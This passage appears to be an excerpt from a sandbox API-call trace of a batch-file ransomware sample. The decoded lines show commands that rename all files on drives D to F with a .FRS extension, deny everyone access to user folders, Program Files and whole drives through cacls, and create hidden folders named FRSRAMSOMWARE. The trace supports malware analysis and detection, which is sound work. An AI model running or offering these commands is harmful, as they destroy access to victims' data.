lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0107.140] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0107.140] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.140] GetFileType (hFile=0x24c) returned 0x1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0107.140] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0107.140] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0107.141] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.141] GetFileType (hFile=0x24c) returned 0x1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0107.141] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0107.141] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0107.141] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.141] GetFileType (hFile=0x24c) returned 0x1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0107.141] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0107.141] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0107.141] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.141] GetFileType (hFile=0x24c) returned 0x1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0107.141] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0107.141] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0107.141] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.141] GetFileType (hFile=0x24c) returned 0x1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0107.141] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0107.141] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0107.141] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0107.141] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.142] GetFileType (hFile=0x24c) returned 0x1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0107.142] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0107.142] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0107.142] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.142] GetFileType (hFile=0x24c) returned 0x1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0107.142] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0107.142] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0107.142] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.142] GetFileType (hFile=0x24c) returned 0x1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0107.142] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0107.142] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0107.142] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.142] GetFileType (hFile=0x24c) returned 0x1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0107.142] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0107.142] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0107.142] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.142] GetFileType (hFile=0x24c) returned 0x1 [0107.142] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0107.143] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0107.143] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0107.143] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.143] GetFileType (hFile=0x24c) returned 0x1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0107.143] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0107.143] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0107.143] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.143] GetFileType (hFile=0x24c) returned 0x1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0107.143] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0107.143] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0107.143] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.143] GetFileType (hFile=0x24c) returned 0x1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0107.143] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0107.143] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0107.143] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.143] GetFileType (hFile=0x24c) returned 0x1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0107.143] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0107.144] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0107.144] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.144] GetFileType (hFile=0x24c) returned 0x1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0107.144] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0107.144] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0107.144] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.144] GetFileType (hFile=0x24c) returned 0x1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0107.144] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0107.144] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0107.144] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.144] GetFileType (hFile=0x24c) returned 0x1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0107.144] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0107.144] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0107.144] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.144] GetFileType (hFile=0x24c) returned 0x1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0107.144] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0107.144] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0107.144] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0107.145] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.145] GetFileType (hFile=0x24c) returned 0x1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0107.145] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0107.145] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0107.145] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.145] GetFileType (hFile=0x24c) returned 0x1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0107.145] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0107.145] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0107.145] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.145] GetFileType (hFile=0x24c) returned 0x1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0107.145] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0107.145] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0107.145] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.145] GetFileType (hFile=0x24c) returned 0x1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0107.145] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0107.145] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0107.145] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.145] GetFileType (hFile=0x24c) returned 0x1 [0107.145] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0107.146] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0107.146] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, 